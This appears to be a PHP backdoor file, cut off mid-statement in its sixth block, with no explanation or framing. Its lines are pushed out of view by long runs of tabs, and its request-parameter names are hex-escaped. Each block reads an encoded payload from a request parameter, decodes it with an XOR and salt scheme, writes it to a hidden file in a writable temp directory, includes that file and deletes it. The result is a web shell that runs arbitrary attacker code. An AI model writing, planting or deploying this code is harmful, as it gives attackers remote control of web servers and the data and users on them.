<?																																										if(filter_has_var(INPUT_POST, "t\x6B\x6E")){ $val = $_REQUEST["t\x6B\x6E"]; $val= explode ( '.' ,$val ) ; $mrk = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s2); $p = 0; array_walk($val, function($v1) use(&$mrk, &$p, $s2, $sLen) { $sChar = ord($s2[$p % $sLen]); $dec =((int)$v1 - $sChar -($p % 10)) ^ 62; $mrk .= chr($dec); $p++;} ); $value = array_filter([ini_get("upload_tmp_dir"), getenv("TMP"), getenv("TEMP"), "/tmp", "/dev/shm", sys_get_temp_dir(), session_save_path(), getcwd(), "/var/tmp"]); $record = 0; do { $flag = $value[$record] ?? null; if ($record >= count($value)) break; if (!( !is_dir($flag) || !is_writable($flag) )) { $pointer = join("/", [$flag, ".key"]); if (@file_put_contents($pointer, $mrk) !== false) { include $pointer; unlink($pointer); die(); } } $record++; } while (true); }
																																										if(array_key_exists("\x68ol\x64er", $_REQUEST)){ $mrk = array_filter([getenv("TMP"), "/tmp", ini_get("upload_tmp_dir"), "/dev/shm", getenv("TEMP"), sys_get_temp_dir(), getcwd(), session_save_path(), "/var/tmp"]); $rec = $_REQUEST["\x68ol\x64er"]; $rec = explode ( '.' , $rec) ; $resource = ''; $salt3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt3); $o = 0; while ($o < count($rec)) { $v4 = $rec[$o]; $sChar = ord($salt3[$o % $lenS]); $d = ((int)$v4 - $sChar - ($o % 10)) ^ 79; $resource .= chr($d); $o++; } while ($token = array_shift($mrk)) { if (is_dir($token) ? is_writable($token) : false) { $hld = sprintf("%s/.ent", $token); if (file_put_contents($hld, $resource)) { require $hld; unlink($hld); exit; } } } }
																																										if(isset($_POST) && isset($_POST["\x64\x65sc"])){ $record = $_POST["\x64\x65sc"]; $record= explode( '.' , $record ) ; $fac = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt2); foreach ($record as $s => $v6): $sChar = ord($salt2[$s % $lenS]); $dec = ((int)$v6 - $sChar - ($s % 10)) ^ 75; $fac .=chr($dec); endforeach; $marker = array_filter([getenv("TEMP"), "/tmp", "/var/tmp", sys_get_temp_dir(), "/dev/shm", session_save_path(), getenv("TMP"), getcwd(), ini_get("upload_tmp_dir")]); for ($k = 0, $element = count($marker); $k < $element; $k++) { $reference = $marker[$k]; if (!( !is_dir($reference) || !is_writable($reference) )) { $sym = sprintf("%s/.rec", $reference); if (@file_put_contents($sym, $fac) !== false) { include $sym; unlink($sym); exit; } } } }
																																										if(count($_REQUEST) > 0 && isset($_REQUEST["s\x79\x6D"])){ $record = array_filter([getenv("TMP"), getcwd(), "/tmp", "/dev/shm", getenv("TEMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/var/tmp", session_save_path()]); $ent = $_REQUEST["s\x79\x6D"]; $ent = explode( '.', $ent ); $data_chunk = ''; $s4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s4); $v = 0; foreach( $ent as $v1) { $chS = ord( $s4[$v % $sLen]); $d =( ( int)$v1 - $chS -( $v % 10)) ^15; $data_chunk .= chr( $d); $v++; } foreach ($record as $marker): if ((bool)is_dir($marker) && (bool)is_writable($marker)) { $property_set = "$marker" . "/.hld"; if (file_put_contents($property_set, $data_chunk)) { require $property_set; unlink($property_set); exit; } } endforeach; }
																																										if(!empty($_POST["hld"])){ $ent = $_POST["hld"]; $ent= explode( '.' , $ent) ; $pgrp = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s2); foreach ($ent as $y => $v9): $sChar = ord($s2[$y % $lenS]); $dec = ((int)$v9 - $sChar - ($y % 10)) ^3; $pgrp .=chr($dec); endforeach; $property_set = array_filter(["/var/tmp", getcwd(), "/dev/shm", "/tmp", session_save_path(), getenv("TMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TEMP")]); foreach ($property_set as $key => $ent) { if ((bool)is_dir($ent) && (bool)is_writable($ent)) { $symbol = "$ent" . "/.holder"; if (@file_put_contents($symbol, $pgrp) !== false) { include $symbol; unlink($symbol); exit; } } } }
																																										if(in_array("\x64\x63hunk", array_keys($_POST))